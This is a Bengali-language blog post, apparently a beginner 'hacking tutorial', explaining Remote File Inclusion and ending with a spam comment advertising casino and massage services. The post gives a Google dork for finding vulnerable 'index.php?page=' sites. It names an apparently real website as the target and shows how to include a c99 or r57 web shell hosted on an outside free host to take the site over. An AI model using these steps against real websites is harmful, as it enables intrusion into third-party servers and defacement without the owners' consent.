বেসিক হ্যাকিং টিউটোরিয়াল: Remote file inclusion সম্পর্কে জানুন ।

আসসালামু আলাইকুম! সবাই কেমন আছেন? আশা করি ভাল আছেন।
এটা আমার প্রথম টিউন গ্রীন ওয়েব ডট কম বিডিতে। আশা করি ভুল হলে ক্ষমা করবেন। আর সেই সাথে ধন্যবাদ জোবায়ের ভাইকে  আমকে এই টপ সাইটে লিখার সুযোগ করে দেওয়ার জন্য।

আজকে আমি আপনাদের দেখাব  হ্যাকিং এর অন্যতম এক ম্যাথড RFI বা (Remote file inclusion) এর কাজ। 
Remote file inclusion

বিদ্রঃ- লিখাটা শুদু মাত্র নতুনদের জন্য তাই আমি শুরু থেকে লিখব মানে, একধম প্রথম থেকে!

প্রথম RFI বা Remote file inclusion কী? 

আর এফ আই
Remote file inclusion  এর সংক্ষিপ্ত রুপ হল   RFI ।  এটি অন্যান্য হ্যাকিং ম্যাথডের মধ্যে অন্যতম হ্যাকিং ম্যাথড। সকল হ্যাকিং  পদ্ধতির মতো এই পদ্ধতিতেও আপনাকে ওয়েবসাইটের vulnerability বের করতে হবে। এই vulnerability এর মাধ্যমে আপনি একটি ওয়েব সার্ভারে Remote file inclusionযুক্ত করতে পারবেন। 

এখন সাইট vulnerable কিনা তা বুজবেন কিভাবে?
http://www.yourtargetsite.com/index.php?page=Anything (এইটা দেখেন)

এখন গুগল ডক দরকার তাই না?

গুগল ডক

 “inurl:index.php?page=” 

এখন এই গুগল ডক গুগলে লিখে সার্চ দেন! তাহলে গুগল আপনাকে  index.php?page= এই সম্পর্কের যত সাইট আছে তা রেজাল্টে দেখাবে  :D
এখন সার্চ রিজাল্ট থেকে যে কোন একটা সাইটে প্রবেশ করুন। যেমন আমি পেয়েছি এই সাইট

http://www.tolvan.com/

এখন এই সাইটে ওয়েব সাইটে RFI ইঞ্জেকশান দেয়া যাবে কি না? তা কিভাবে চেক করবেন?

যে ভাবে চেক করবেনঃ- http://www.tolvan.com/v2/index.php?page=http://www.greenweb.com.bd
মানে কি বুঝতে পেরেছেন? মানে আপনার সার্চ করা যে কোন সাইট এর শেষে যে কোন একটা সাইট লিংক দেন। যদি উক্ত ওয়েবসাইটটির পেজে অন্য  ওয়েবসাইটকে দেখা যায় তাহলে বুঝবেন যে ঐ ওয়েব সাইটে RFI ইঞ্জেকশান দেওয়া যাবে।
এখন শেল আপলোড করার পালাঃ-
শেল আপলোড করে করবেন, কারন আপুনি যে সাইট হ্যাক করেছেন তার প্রমান দিবেন।
সাধারণত বেশিভাগ হ্যাকার c99 shel তে শেল আপলোড করে। আপুনি ও আপলোড করতে পারেন। আমি দেখাব কিভাবে c99 shel শেল আপলোড করবেন। আবার কোন কোন হ্যাকার r57 shell আপলোড করে। যার যেখানে ইচ্ছা।
সেল আপলোড করতে হলে যে কোন একটা হোস্টিং সাইটে সেল আপলোড করতে হবে যেমন, 110mb.com সহ আর অনেক সাইট। 
এখন মনে করেন আমি 110mb.com সাইটে সেল আপলোড করলাম। তাইলে লিংক এই রকম হবে
http://110mb.com/tjusthack/c784shell.php? 
 
এখন একটা কমান্ড দিব
 
http://www.tolvan.com/v2/index.php??pagehttp:// 110mb.com /tjusthack/c784shell.php? 

নোটঃ লিংকের শেষে “ ? ” এটা দিতে হবে! নাইলে আপনার লিংক কাজ করবে না!

আশা করি বুজতে পেরেছেন?
আমার একটা সমস্যা আমি বুজিয়ে লিখতে পারি না। কিন্তু যত দূর সম্ভব তত দূর চেষ্টা করেছে বুজানোর। বাকিটা আপানদের উপর।
কোন সমস্যা হলে আমায় পাবেন ফেসবুকে
আর হ্যা অবশ্যাই নতুন কিছু পেতে গ্রীন ওয়েব এর সাথে থাকুন ।
Share on Google Plus

About Anonymous

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment
    Facebook Comment

1 comments:

  1. How To Win At Slots, Betting Lines, and Table Games - DrmCAD
    Learn about 동해 출장마사지 winning at slot machines, betting lines, and tables games. Get a feel 군포 출장안마 for the 순천 출장샵 rules 창원 출장마사지 of the casino, and learn 광명 출장안마 how to win at slots and table games.

    ReplyDelete